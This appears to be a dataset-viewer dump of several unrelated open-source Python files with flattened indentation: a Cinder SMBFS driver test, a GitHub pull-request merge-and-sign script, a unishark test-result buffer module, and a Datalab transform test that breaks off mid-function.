gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
# Copyright 2014 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import mock
from oslo_utils import units
from cinder import exception
from cinder.image import image_utils
from cinder import test
from cinder.volume.drivers.windows import smbfs
class WindowsSmbFsTestCase(test.TestCase):
_FAKE_SHARE = '//1.2.3.4/share1'
_FAKE_MNT_BASE = 'c:\openstack\mnt'
_FAKE_MNT_POINT = os.path.join(_FAKE_MNT_BASE, 'fake_hash')
_FAKE_VOLUME_NAME = 'volume-4f711859-4928-4cb7-801a-a50c37ceaccc'
_FAKE_SNAPSHOT_NAME = _FAKE_VOLUME_NAME + '-snapshot.vhdx'
_FAKE_SNAPSHOT_PATH = os.path.join(_FAKE_MNT_POINT,
_FAKE_SNAPSHOT_NAME)
_FAKE_TOTAL_SIZE = '2048'
_FAKE_TOTAL_AVAILABLE = '1024'
_FAKE_TOTAL_ALLOCATED = 1024
_FAKE_VOLUME = {'id': 'e8d76af4-cbb9-4b70-8e9e-5a133f1a1a66',
'size': 1,
'provider_location': _FAKE_SHARE}
_FAKE_SNAPSHOT = {'id': '35a23942-7625-4683-ad84-144b76e87a80',
'volume': _FAKE_VOLUME,
'volume_size': _FAKE_VOLUME['size']}
_FAKE_SHARE_OPTS = '-o username=Administrator,password=12345'
_FAKE_VOLUME_PATH = os.path.join(_FAKE_MNT_POINT,
_FAKE_VOLUME_NAME + '.vhdx')
@mock.patch.object(smbfs, 'utilsfactory')
@mock.patch.object(smbfs, 'remotefs')
def setUp(self, mock_remotefs, mock_utilsfactory):
super(WindowsSmbFsTestCase, self).setUp()
self._smbfs_driver = smbfs.WindowsSmbfsDriver(
configuration=mock.Mock())
self._smbfs_driver._delete = mock.Mock()
self._smbfs_driver.local_path = mock.Mock(
return_value=self._FAKE_VOLUME_PATH)
def _test_create_volume(self, volume_exists=False, volume_format='vhdx'):
self._smbfs_driver.create_dynamic_vhd = mock.MagicMock()
fake_create = self._smbfs_driver._vhdutils.create_dynamic_vhd
self._smbfs_driver.get_volume_format = mock.Mock(
return_value=volume_format)
with mock.patch('os.path.exists', new=lambda x: volume_exists):
if volume_exists or volume_format not in ('vhd', 'vhdx'):
self.assertRaises(exception.InvalidVolume,
self._smbfs_driver._do_create_volume,
self._FAKE_VOLUME)
else:
fake_vol_path = self._FAKE_VOLUME_PATH
self._smbfs_driver._do_create_volume(self._FAKE_VOLUME)
fake_create.assert_called_once_with(
fake_vol_path, self._FAKE_VOLUME['size'] << 30)
def test_create_volume(self):
self._test_create_volume()
def test_create_existing_volume(self):
self._test_create_volume(True)
def test_create_volume_invalid_volume(self):
self._test_create_volume(volume_format="qcow")
def test_get_capacity_info(self):
self._smbfs_driver._smbutils.get_share_capacity_info.return_value = (
self._FAKE_TOTAL_SIZE, self._FAKE_TOTAL_AVAILABLE)
self._smbfs_driver._get_total_allocated = mock.Mock(
return_value=self._FAKE_TOTAL_ALLOCATED)
ret_val = self._smbfs_driver._get_capacity_info(self._FAKE_SHARE)
expected_ret_val = [int(x) for x in [self._FAKE_TOTAL_SIZE,
self._FAKE_TOTAL_AVAILABLE,
self._FAKE_TOTAL_ALLOCATED]]
self.assertEqual(expected_ret_val, ret_val)
def _test_get_img_info(self, backing_file=None):
self._smbfs_driver._vhdutils.get_vhd_parent_path.return_value = (
backing_file)
image_info = self._smbfs_driver._qemu_img_info(self._FAKE_VOLUME_PATH)
self.assertEqual(self._FAKE_VOLUME_NAME + '.vhdx',
image_info.image)
backing_file_name = backing_file and os.path.basename(backing_file)
self.assertEqual(backing_file_name, image_info.backing_file)
def test_get_img_info_without_backing_file(self):
self._test_get_img_info()
def test_get_snapshot_info(self):
self._test_get_img_info(self._FAKE_VOLUME_PATH)
def test_create_snapshot(self):
self._smbfs_driver._vhdutils.create_differencing_vhd = (
mock.Mock())
self._smbfs_driver._local_volume_dir = mock.Mock(
return_value=self._FAKE_MNT_POINT)
fake_create_diff = (
self._smbfs_driver._vhdutils.create_differencing_vhd)
self._smbfs_driver._do_create_snapshot(
self._FAKE_SNAPSHOT,
os.path.basename(self._FAKE_VOLUME_PATH),
self._FAKE_SNAPSHOT_PATH)
fake_create_diff.assert_called_once_with(self._FAKE_SNAPSHOT_PATH,
self._FAKE_VOLUME_PATH)
def _test_copy_volume_to_image(self, has_parent=False,
volume_format='vhd'):
drv = self._smbfs_driver
fake_image_meta = {'id': 'fake-image-id'}
if has_parent:
fake_volume_path = self._FAKE_SNAPSHOT_PATH
fake_parent_path = self._FAKE_VOLUME_PATH
else:
fake_volume_path = self._FAKE_VOLUME_PATH
fake_parent_path = None
if volume_format == drv._DISK_FORMAT_VHD:
fake_volume_path = fake_volume_path[:-1]
fake_active_image = os.path.basename(fake_volume_path)
drv.get_active_image_from_info = mock.Mock(
return_value=fake_active_image)
drv._local_volume_dir = mock.Mock(
return_value=self._FAKE_MNT_POINT)
drv.get_volume_format = mock.Mock(
return_value=volume_format)
drv._vhdutils.get_vhd_parent_path.return_value = (
fake_parent_path)
with mock.patch.object(image_utils, 'upload_volume') as (
fake_upload_volume):
drv.copy_volume_to_image(
mock.sentinel.context, self._FAKE_VOLUME,
mock.sentinel.image_service, fake_image_meta)
expected_conversion = (
has_parent or volume_format == drv._DISK_FORMAT_VHDX)
if expected_conversion:
fake_temp_image_name = '%s.temp_image.%s.%s' % (
self._FAKE_VOLUME['id'],
fake_image_meta['id'],
drv._DISK_FORMAT_VHD)
fake_temp_image_path = os.path.join(
self._FAKE_MNT_POINT,
fake_temp_image_name)
fake_active_image_path = os.path.join(
self._FAKE_MNT_POINT,
fake_active_image)
upload_path = fake_temp_image_path
drv._vhdutils.convert_vhd.assert_called_once_with(
fake_active_image_path,
fake_temp_image_path)
drv._delete.assert_called_once_with(
fake_temp_image_path)
else:
upload_path = fake_volume_path
fake_upload_volume.assert_called_once_with(
mock.sentinel.context, mock.sentinel.image_service,
fake_image_meta, upload_path, drv._DISK_FORMAT_VHD)
def test_copy_volume_to_image_having_snapshot(self):
self._test_copy_volume_to_image(has_parent=True)
def test_copy_vhdx_volume_to_image(self):
self._test_copy_volume_to_image(volume_format='vhdx')
def test_copy_vhd_volume_to_image(self):
self._test_copy_volume_to_image(volume_format='vhd')
def test_copy_image_to_volume(self):
drv = self._smbfs_driver
drv.get_volume_format = mock.Mock(
return_value=mock.sentinel.volume_format)
drv.local_path = mock.Mock(
return_value=self._FAKE_VOLUME_PATH)
drv.configuration = mock.MagicMock()
drv.configuration.volume_dd_blocksize = mock.sentinel.block_size
with mock.patch.object(image_utils,
'fetch_to_volume_format') as fake_fetch:
drv.copy_image_to_volume(
mock.sentinel.context, self._FAKE_VOLUME,
mock.sentinel.image_service,
mock.sentinel.image_id)
fake_fetch.assert_called_once_with(
mock.sentinel.context,
mock.sentinel.image_service,
mock.sentinel.image_id,
self._FAKE_VOLUME_PATH, mock.sentinel.volume_format,
mock.sentinel.block_size)
drv._vhdutils.resize_vhd.assert_called_once_with(
self._FAKE_VOLUME_PATH,
self._FAKE_VOLUME['size'] * units.Gi)
def test_copy_volume_from_snapshot(self):
drv = self._smbfs_driver
fake_volume_info = {
self._FAKE_SNAPSHOT['id']: 'fake_snapshot_file_name'}
fake_img_info = mock.MagicMock()
fake_img_info.backing_file = self._FAKE_VOLUME_NAME + '.vhdx'
drv._local_path_volume_info = mock.Mock(
return_value=self._FAKE_VOLUME_PATH + '.info')
drv._local_volume_dir = mock.Mock(
return_value=self._FAKE_MNT_POINT)
drv._read_info_file = mock.Mock(
return_value=fake_volume_info)
drv._qemu_img_info = mock.Mock(
return_value=fake_img_info)
drv.local_path = mock.Mock(
return_value=mock.sentinel.new_volume_path)
drv._copy_volume_from_snapshot(
self._FAKE_SNAPSHOT, self._FAKE_VOLUME,
self._FAKE_VOLUME['size'])
drv._delete.assert_called_once_with(mock.sentinel.new_volume_path)
drv._vhdutils.convert_vhd.assert_called_once_with(
self._FAKE_VOLUME_PATH,
mock.sentinel.new_volume_path)
drv._vhdutils.resize_vhd.assert_called_once_with(
mock.sentinel.new_volume_path,
self._FAKE_VOLUME['size'] * units.Gi)
def test_rebase_img(self):
drv = self._smbfs_driver
drv._rebase_img(
self._FAKE_SNAPSHOT_PATH,
self._FAKE_VOLUME_NAME + '.vhdx', 'vhdx')
drv._vhdutils.reconnect_parent_vhd.assert_called_once_with(
self._FAKE_SNAPSHOT_PATH, self._FAKE_VOLUME_PATH)
|
|
#!/usr/bin/env python2
# Copyright (c) 2016 Bitcredit Core Developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# This script will locally construct a merge commit for a pull request on a
# github repository, inspect it, sign it and optionally push it.
# The following temporary branches are created/overwritten and deleted:
# * pull/$PULL/base (the current master we're merging onto)
# * pull/$PULL/head (the current state of the remote pull request)
# * pull/$PULL/merge (github's merge)
# * pull/$PULL/local-merge (our merge)
# In case of a clean merge that is accepted by the user, the local branch with
# name $BRANCH is overwritten with the merged result, and optionally pushed.
from __future__ import division,print_function,unicode_literals
import os,sys
from sys import stdin,stdout,stderr
import argparse
import subprocess
# External tools (can be overridden using environment)
GIT = os.getenv('GIT','git')
BASH = os.getenv('BASH','bash')
# OS specific configuration for terminal attributes
ATTR_RESET = ''
ATTR_PR = ''
COMMIT_FORMAT = '%h %s (%an)%d'
if os.name == 'posix': # if posix, assume we can use basic terminal escapes
ATTR_RESET = '\033[0m'
ATTR_PR = '\033[1;36m'
COMMIT_FORMAT = '%C(bold blue)%h%Creset %s %C(cyan)(%an)%Creset%C(green)%d%Creset'
def git_config_get(option, default=None):
'''
Get named configuration option from git repository.
'''
try:
return subprocess.check_output([GIT,'config','--get',option]).rstrip()
except subprocess.CalledProcessError as e:
return default
def retrieve_pr_title(repo,pull):
'''
Retrieve pull request title from github.
Return None if no title can be found, or an error happens.
'''
import urllib2,json
try:
req = urllib2.Request("https://api.github.com/repos/"+repo+"/pulls/"+pull)
result = urllib2.urlopen(req)
result = json.load(result)
return result['title']
except Exception as e:
print('Warning: unable to retrieve pull title from github: %s' % e)
return None
def ask_prompt(text):
print(text,end=" ",file=stderr)
reply = stdin.readline().rstrip()
print("",file=stderr)
return reply
def parse_arguments(branch):
epilog = '''
In addition, you can set the following git configuration variables:
githubmerge.repository (mandatory),
user.signingkey (mandatory),
githubmerge.host (default: git@github.com),
githubmerge.branch (default: master),
githubmerge.testcmd (default: none).
'''
parser = argparse.ArgumentParser(description='Utility to merge, sign and push github pull requests',
epilog=epilog)
parser.add_argument('pull', metavar='PULL', type=int, nargs=1,
help='Pull request ID to merge')
parser.add_argument('branch', metavar='BRANCH', type=str, nargs='?',
default=branch, help='Branch to merge against (default: '+branch+')')
return parser.parse_args()
def main():
# Extract settings from git repo
repo = git_config_get('githubmerge.repository')
host = git_config_get('githubmerge.host','git@github.com')
branch = git_config_get('githubmerge.branch','master')
testcmd = git_config_get('githubmerge.testcmd')
signingkey = git_config_get('user.signingkey')
if repo is None:
print("ERROR: No repository configured. Use this command to set:", file=stderr)
print("git config githubmerge.repository <owner>/<repo>", file=stderr)
exit(1)
if signingkey is None:
print("ERROR: No GPG signing key set. Set one using:",file=stderr)
print("git config --global user.signingkey <key>",file=stderr)
exit(1)
host_repo = host+":"+repo # shortcut for push/pull target
# Extract settings from command line
args = parse_arguments(branch)
pull = str(args.pull[0])
branch = args.branch
# Initialize source branches
head_branch = 'pull/'+pull+'/head'
base_branch = 'pull/'+pull+'/base'
merge_branch = 'pull/'+pull+'/merge'
local_merge_branch = 'pull/'+pull+'/local-merge'
devnull = open(os.devnull,'w')
try:
subprocess.check_call([GIT,'checkout','-q',branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot check out branch %s." % (branch), file=stderr)
exit(3)
try:
subprocess.check_call([GIT,'fetch','-q',host_repo,'+refs/pull/'+pull+'/*:refs/heads/pull/'+pull+'/*'])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find pull request #%s on %s." % (pull,host_repo), file=stderr)
exit(3)
try:
subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+head_branch], stdout=devnull, stderr=stdout)
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find head of pull request #%s on %s." % (pull,host_repo), file=stderr)
exit(3)
try:
subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+merge_branch], stdout=devnull, stderr=stdout)
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find merge of pull request #%s on %s." % (pull,host_repo), file=stderr)
exit(3)
try:
subprocess.check_call([GIT,'fetch','-q',host_repo,'+refs/heads/'+branch+':refs/heads/'+base_branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find branch %s on %s." % (branch,host_repo), file=stderr)
exit(3)
subprocess.check_call([GIT,'checkout','-q',base_branch])
subprocess.call([GIT,'branch','-q','-D',local_merge_branch], stderr=devnull)
subprocess.check_call([GIT,'checkout','-q','-b',local_merge_branch])
try:
# Create unsigned merge commit.
title = retrieve_pr_title(repo,pull)
if title:
firstline = 'Merge #%s: %s' % (pull,title)
else:
firstline = 'Merge #%s' % (pull,)
message = firstline + '\n\n'
message += subprocess.check_output([GIT,'log','--no-merges','--topo-order','--pretty=format:%h %s (%an)',base_branch+'..'+head_branch]).decode('utf-8')
try:
subprocess.check_call([GIT,'merge','-q','--commit','--no-edit','--no-ff','-m',message.encode('utf-8'),head_branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot be merged cleanly.",file=stderr)
subprocess.check_call([GIT,'merge','--abort'])
exit(4)
logmsg = subprocess.check_output([GIT,'log','--pretty=format:%s','-n','1']).decode('utf-8')
if logmsg.rstrip() != firstline.rstrip():
print("ERROR: Creating merge failed (already merged?).",file=stderr)
exit(4)
print('%s#%s%s %s' % (ATTR_RESET+ATTR_PR,pull,ATTR_RESET,title))
subprocess.check_call([GIT,'log','--graph','--topo-order','--pretty=format:'+COMMIT_FORMAT,base_branch+'..'+head_branch])
print()
# Run test command if configured.
if testcmd:
# Go up to the repository's root.
toplevel = subprocess.check_output([GIT,'rev-parse','--show-toplevel']).strip()
os.chdir(toplevel)
if subprocess.call(testcmd,shell=True):
print("ERROR: Running %s failed." % testcmd,file=stderr)
exit(5)
# Show the created merge.
diff = subprocess.check_output([GIT,'diff',merge_branch+'..'+local_merge_branch])
subprocess.check_call([GIT,'diff',base_branch+'..'+local_merge_branch])
if diff:
print("WARNING: merge differs from github!",file=stderr)
reply = ask_prompt("Type 'ignore' to continue.")
if reply.lower() == 'ignore':
print("Difference with github ignored.",file=stderr)
else:
exit(6)
reply = ask_prompt("Press 'd' to accept the diff.")
if reply.lower() == 'd':
print("Diff accepted.",file=stderr)
else:
print("ERROR: Diff rejected.",file=stderr)
exit(6)
else:
# Verify the result manually.
print("Dropping you on a shell so you can try building/testing the merged source.",file=stderr)
print("Run 'git diff HEAD~' to show the changes being merged.",file=stderr)
print("Type 'exit' when done.",file=stderr)
if os.path.isfile('/etc/debian_version'): # Show pull number on Debian default prompt
os.putenv('debian_chroot',pull)
subprocess.call([BASH,'-i'])
reply = ask_prompt("Type 'm' to accept the merge.")
if reply.lower() == 'm':
print("Merge accepted.",file=stderr)
else:
print("ERROR: Merge rejected.",file=stderr)
exit(7)
# Sign the merge commit.
reply = ask_prompt("Type 's' to sign off on the merge.")
if reply == 's':
try:
subprocess.check_call([GIT,'commit','-q','--gpg-sign','--amend','--no-edit'])
except subprocess.CalledProcessError as e:
print("Error signing, exiting.",file=stderr)
exit(1)
else:
print("Not signing off on merge, exiting.",file=stderr)
exit(1)
# Put the result in branch.
subprocess.check_call([GIT,'checkout','-q',branch])
subprocess.check_call([GIT,'reset','-q','--hard',local_merge_branch])
finally:
# Clean up temporary branches.
subprocess.call([GIT,'checkout','-q',branch])
subprocess.call([GIT,'branch','-q','-D',head_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',base_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',merge_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',local_merge_branch],stderr=devnull)
# Push the result.
reply = ask_prompt("Type 'push' to push the result to %s, branch %s." % (host_repo,branch))
if reply.lower() == 'push':
subprocess.check_call([GIT,'push',host_repo,'refs/heads/'+branch])
if __name__ == '__main__':
main()
|
|
# Copyright 2015 Twitter, Inc and other contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import TextTestResult
import time
from sys import stdout, stderr, version_info
import traceback
from unishark.util import (get_long_class_name, get_long_method_name, get_module_name)
import threading
from collections import deque
from inspect import ismodule
WritelnDecorator = getattr(getattr(__import__('unittest'), 'runner'), '_WritelnDecorator')
_io = None
if version_info[0] < 3: # Python2.x (2.7)
_io = __import__('StringIO')
# Try making instance method picklable (for multiprocessing) in Python2
# No need to do this in Python3.x
def _reduce_method(m):
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
copy_reg = __import__('copy_reg')
types = __import__('types')
copy_reg.pickle(types.MethodType, _reduce_method)
else: # Python3.x
_io = __import__('io')
if _io is None or not ismodule(_io):
raise ImportError
def _make_buffer():
return _io.StringIO()
class _PooledIOBuffer(object):
_lock = threading.RLock()
def __init__(self):
self.buff_queue = deque()
self.buff_queue.append(_make_buffer())
self.buff_dict = dict()
def _get_buff(self):
with _PooledIOBuffer._lock:
if not self.buff_queue:
return _make_buffer()
else:
return self.buff_queue.popleft()
def write(self, *args, **kwargs):
i = threading.current_thread().ident
if i not in self.buff_dict:
buff = self._get_buff()
self.buff_dict[i] = buff
self.buff_dict[i].write(*args, **kwargs)
def getvalue(self, *args, **kwargs):
i = threading.current_thread().ident
return self.buff_dict[i].getvalue(*args, **kwargs) if i in self.buff_dict else None
def flush(self, *args, **kwargs):
i = threading.current_thread().ident
if i in self.buff_dict:
self.buff_dict[i].flush(*args, **kwargs)
def seek(self, *args, **kwargs):
i = threading.current_thread().ident
if i in self.buff_dict:
self.buff_dict[i].seek(*args, **kwargs)
def truncate(self, *args, **kwargs):
i = threading.current_thread().ident
if i in self.buff_dict:
self.buff_dict[i].truncate(*args, **kwargs)
def free(self):
i = threading.current_thread().ident
if i in self.buff_dict:
buff = self.buff_dict.pop(threading.current_thread().ident)
buff.seek(0)
buff.truncate()
self.buff_queue.append(buff)
_io_buffer = _PooledIOBuffer()
out = _io_buffer
PASS = 0
SKIPPED = 1
ERROR = 2
FAIL = 3
EXPECTED_FAIL = 4
UNEXPECTED_PASS = 5
class BufferedTestResult(TextTestResult):
def __init__(self, stream, descriptions, verbosity):
super(BufferedTestResult, self).__init__(stream, descriptions, verbosity)
self.buffer = False
# key: module_name.class_name, value: a list of results.
# One result is a tuple like (test method name, method doc, duration, status, output, traceback)
self.results = dict()
self.start_time = 0.0
self.sum_duration = 0.0
self.successes = 0
self.name = 'test'
self.description = ''
self.children = []
def __len__(self):
return len(self.children)
def __iter__(self):
return iter(self.children)
def __getstate__(self):
# called before pickling
state = self.__dict__.copy()
if 'stream' in state:
del state['stream']
if '_original_stderr' in state:
del state['_original_stderr']
if '_original_stdout' in state:
del state['_original_stdout']
return state
def __setstate__(self, state):
# called while unpickling
self.__dict__.update(state)
self.__dict__['stream'] = WritelnDecorator(stderr)
self.__dict__['_original_stderr'] = stderr
self.__dict__['_original_stdout'] = stdout
def _add_result(self, test, duration, status, output, trace_back):
mod_name = get_module_name(test)
cls_name = get_long_class_name(test)
if mod_name not in self.results:
self.results[mod_name] = dict()
if cls_name not in self.results[mod_name]:
self.results[mod_name][cls_name] = []
test_name, test_doc = self.__class__._get_test_info(test)
output = output or 'No Log\n'
trace_back = trace_back or 'No Exception\n'
self.results[mod_name][cls_name].append((test_name, test_doc, duration, status, output, trace_back))
@staticmethod
def _get_test_info(test):
test_name = get_long_method_name(test)
test_doc = getattr(test, '_testMethodDoc', None)
return test_name, test_doc or 'No Method Doc\n'
def _exc_info_to_string(self, error, test):
"""Almost the same as its base class implementation, except eliminating the mirror output"""
exctype, value, tb = error
# Skip test runner traceback levels
while tb and self._is_relevant_tb_level(tb):
tb = tb.tb_next
if exctype is test.failureException:
# Skip assert*() traceback levels
length = self._count_relevant_tb_levels(tb)
msg_lines = traceback.format_exception(exctype, value, tb, length)
else:
msg_lines = traceback.format_exception(exctype, value, tb)
return ''.join(msg_lines)
def startTest(self, test):
super(BufferedTestResult, self).startTest(test)
self.start_time = time.time()
def stopTest(self, test):
self._mirrorOutput = False
_io_buffer.free()
# In Python3.3,
# clear the exceptions info (from sys.exc_info()) stored in the test case obj after the test case runs,
# for traceback cannot be pickled during multiprocessing.
# It is OK to clear them because the exceptions info is already converted to strings
# and stored in the result obj by addFailure, addError or addExpectedFailure.
# Versions above Python3.3 already have the following cleanup steps in unittest.case.TestCase.run
if version_info[:2] == (3, 3):
outcome = getattr(test, '_outcomeForDoCleanups', None) or getattr(test, '_outcome', None)
if outcome:
if getattr(outcome, 'unexpectedSuccess', None):
outcome.unexpectedSuccess = None
if getattr(outcome, 'expectedFailure', None):
outcome.expectedFailure = None
if getattr(outcome, 'errors', None):
outcome.errors.clear()
if getattr(outcome, 'failures', None):
outcome.failures.clear()
def addSuccess(self, test):
duration = time.time() - self.start_time
super(BufferedTestResult, self).addSuccess(test)
self.successes += 1
self._add_result(test, duration, PASS, _io_buffer.getvalue(), '')
def addError(self, test, error):
duration = time.time() - self.start_time
super(BufferedTestResult, self).addError(test, error)
test_obj, exception_str = self.errors[-1]
self._add_result(test, duration, ERROR, _io_buffer.getvalue(), exception_str)
def addFailure(self, test, error):
duration = time.time() - self.start_time
super(BufferedTestResult, self).addFailure(test, error)
test_obj, exception_str = self.failures[-1]
self._add_result(test, duration, FAIL, _io_buffer.getvalue(), exception_str)
def addSkip(self, test, reason):
duration = time.time() - self.start_time
super(BufferedTestResult, self).addSkip(test, reason)
test_obj, reason = self.skipped[-1]
self._add_result(test, duration, SKIPPED, _io_buffer.getvalue(), 'Skipped: {0!r}'.format(reason))
def addExpectedFailure(self, test, error):
duration = time.time() - self.start_time
super(BufferedTestResult, self).addExpectedFailure(test, error)
test_obj, exception_str = self.expectedFailures[-1]
self._add_result(test, duration, EXPECTED_FAIL, _io_buffer.getvalue(), exception_str)
def addUnexpectedSuccess(self, test):
duration = time.time() - self.start_time
super(BufferedTestResult, self).addUnexpectedSuccess(test)
self._add_result(test, duration, UNEXPECTED_PASS, _io_buffer.getvalue(), '')
def wasSuccessful(self):
return len(self.failures) == len(self.errors) == len(self.unexpectedSuccesses) == 0
def combine_results(result, results):
for r in results:
result.failures.extend(r.failures)
result.errors.extend(r.errors)
result.testsRun += r.testsRun
result.skipped.extend(r.skipped)
result.expectedFailures.extend(r.expectedFailures)
result.unexpectedSuccesses.extend(r.unexpectedSuccesses)
result.successes += r.successes
for mod_name, mod in r.results.items():
if mod_name not in result.results:
result.results[mod_name] = dict()
for cls_name, tups in mod.items():
if cls_name not in result.results[mod_name]:
result.results[mod_name][cls_name] = []
result.results[mod_name][cls_name].extend(tups)
|
|
from __future__ import absolute_import
from __future__ import print_function
import json
import os
import pandas as pd
from PIL import Image
import shutil
from six.moves.urllib.request import urlopen
import subprocess
import tempfile
import unittest
import uuid
import tensorflow as tf
from tensorflow.python.lib.io import file_io
import google.datalab as dl
import google.datalab.bigquery as bq
import google.datalab.storage as storage
CODE_PATH = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', 'tensorflow'))
# TODO: travis tests failed because sometimes a VM has gcloud signed-in
# (maybe due to failed cleanup) with default project set and BQ is not enabled.
# In that case the cloud tests will fail. Disable it for now.
RUN_CLOUD_TESTS = False
class TestTransformRawData(unittest.TestCase):
"""Tests for applying a saved model"""
@classmethod
def setUpClass(cls):
# Set up dirs.
cls.working_dir = tempfile.mkdtemp()
cls.source_dir = os.path.join(cls.working_dir, 'source')
cls.analysis_dir = os.path.join(cls.working_dir, 'analysis')
cls.output_dir = os.path.join(cls.working_dir, 'output')
file_io.create_dir(cls.source_dir)
# Make test image files.
img1_file = os.path.join(cls.source_dir, 'img1.jpg')
image1 = Image.new('RGB', size=(300, 300), color=(155, 0, 0))
image1.save(img1_file)
img2_file = os.path.join(cls.source_dir, 'img2.jpg')
image2 = Image.new('RGB', size=(50, 50), color=(125, 240, 0))
image2.save(img2_file)
img3_file = os.path.join(cls.source_dir, 'img3.jpg')
image3 = Image.new('RGB', size=(800, 600), color=(33, 55, 77))
image3.save(img3_file)
# Download inception checkpoint. Note that gs url doesn't work because
# we may not have gcloud signed in when running the test.
url = ('https://storage.googleapis.com/cloud-ml-data/img/' +
'flower_photos/inception_v3_2016_08_28.ckpt')
checkpoint_path = os.path.join(cls.working_dir, "checkpoint")
response = urlopen(url)
with open(checkpoint_path, 'wb') as f:
f.write(response.read())
# Make csv input file
cls.csv_input_filepath = os.path.join(cls.source_dir, 'input.csv')
file_io.write_string_to_file(
cls.csv_input_filepath,
'1,1,Monday,23.0,%s\n' % img1_file +
'2,0,Friday,18.0,%s\n' % img2_file +
'3,0,Sunday,12.0,%s\n' % img3_file)
# Call analyze.py to create analysis results.
schema = [{'name': 'key_col', 'type': 'INTEGER'},
{'name': 'target_col', 'type': 'FLOAT'},
{'name': 'cat_col', 'type': 'STRING'},
{'name': 'num_col', 'type': 'FLOAT'},
{'name': 'img_col', 'type': 'STRING'}]
schema_file = os.path.join(cls.source_dir, 'schema.json')
file_io.write_string_to_file(schema_file, json.dumps(schema))
features = {'key_col': {'transform': 'key'},
'target_col': {'transform': 'target'},
'cat_col': {'transform': 'one_hot'},
'num_col': {'transform': 'identity'},
'img_col': {'transform': 'image_to_vec', 'checkpoint': checkpoint_path}}
features_file = os.path.join(cls.source_dir, 'features.json')
file_io.write_string_to_file(features_file, json.dumps(features))
cmd = ['python ' + os.path.join(CODE_PATH, 'analyze.py'),
'--output=' + cls.analysis_dir,
'--csv=' + cls.csv_input_filepath,
'--schema=' + schema_file,
'--features=' + features_file]
subprocess.check_call(' '.join(cmd), shell=True)
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.working_dir)
def test_local_csv_transform(self):
"""Test transfrom from local csv files."""
cmd = ['python ' + os.path.join(CODE_PATH, 'transform.py'),
'--csv=' + self.csv_input_filepath,
'--analysis=' + self.analysis_dir,
'--prefix=features',
'--output=' + self.output_dir]
print('cmd ', ' '.join(cmd))
subprocess.check_call(' '.join(cmd), shell=True)
# Read the tf record file. There should only be one file.
record_filepath = os.path.join(self.output_dir,
'features-00000-of-00001.tfrecord.gz')
options = tf.python_io.TFRecordOptions(
compression_type=tf.python_io.TFRecordCompressionType.GZIP)
serialized_examples = list(tf.python_io.tf_record_iterator(record_filepath, options=options))
self.assertEqual(len(serialized_examples), 3)
# Find the example with key=1 in the file.
first_example = None
for ex in serialized_examples:
example = tf.train.Example()
example.ParseFromString(ex)
if example.features.feature['key_col'].int64_list.value[0] == 1:
first_example = example
self.assertIsNotNone(first_example)
transformed_number = first_example.features.feature['num_col'].float_list.value[0]
self.assertAlmostEqual(transformed_number, 23.0)
# transformed category = row number in the vocab file.
transformed_category = first_example.features.feature['cat_col'].int64_list.value[0]
vocab = pd.read_csv(
os.path.join(self.analysis_dir, 'vocab_cat_col.csv'),
header=None,
names=['label', 'count'],
dtype=str)
origional_category = vocab.iloc[transformed_category]['label']
self.assertEqual(origional_category, 'Monday')
image_bytes = first_example.features.feature['img_col'].float_list.value
self.assertEqual(len(image_bytes), 2048)
self.assertTrue(any(x != 0.0 for x in image_bytes))
@unittest.skipIf(not RUN_CLOUD_TESTS, 'GCS access missing')
def test_local_bigquery_transform(self):
"""Test transfrom locally, but the data comes from bigquery."""
# Make a BQ table, and insert 1 row.
try:
bucket_name = 'temp_pydatalab_test_%s' % uuid.uuid4().hex
bucket_root = 'gs://%s' % bucket_name
bucket = storage.Bucket(bucket_name)
bucket.create()
project_id = dl.Context.default().project_id
dataset_name = 'test_transform_raw_data_%s' % uuid.uuid4().hex
table_name = 'tmp_table'
dataset = bq.Dataset((project_id, dataset_name)).create()
table = bq.Table((project_id, dataset_name, table_name))
table.create([{'name': 'key_col', 'type': 'INTEGER'},
{'name': 'target_col', 'type': 'FLOAT'},
{'name': 'cat_col', 'type': 'STRING'},
{'name': 'num_col', 'type': 'FLOAT'},
{'name': 'img_col', 'type': 'STRING'}])
img1_file = os.path.join(self.source_dir, 'img1.jpg')
dest_file = os.path.join(bucket_root, 'img1.jpg')
file_io.copy(img1_file, dest_file)
data = [
{
'key_col': 1,
'target_col': 1.0,
'cat_col': 'Monday',
'num_col': 23.0,
'img_col': dest_file,
},
]
table.insert(data=data)
cmd = ['python ' + os.path.join(CODE_PATH, 'transform.py'),
'--bigquery=%s.%s.%s' % (project_id, dataset_name, table_name),
'--analysis=' + self.analysis_dir,
'--prefix=features',
'--project-id=' + project_id,
'--output=' + self.output_dir]
print('cmd ', ' '.join(cmd))
subprocess.check_call(' '.join(cmd), shell=True)
# Read the tf record file. There should only be one file.
record_filepath = os.path.join(self.output_dir,
'features-00000-of-00001.tfrecord.gz')
options = tf.python_io.TFRecordOptions(
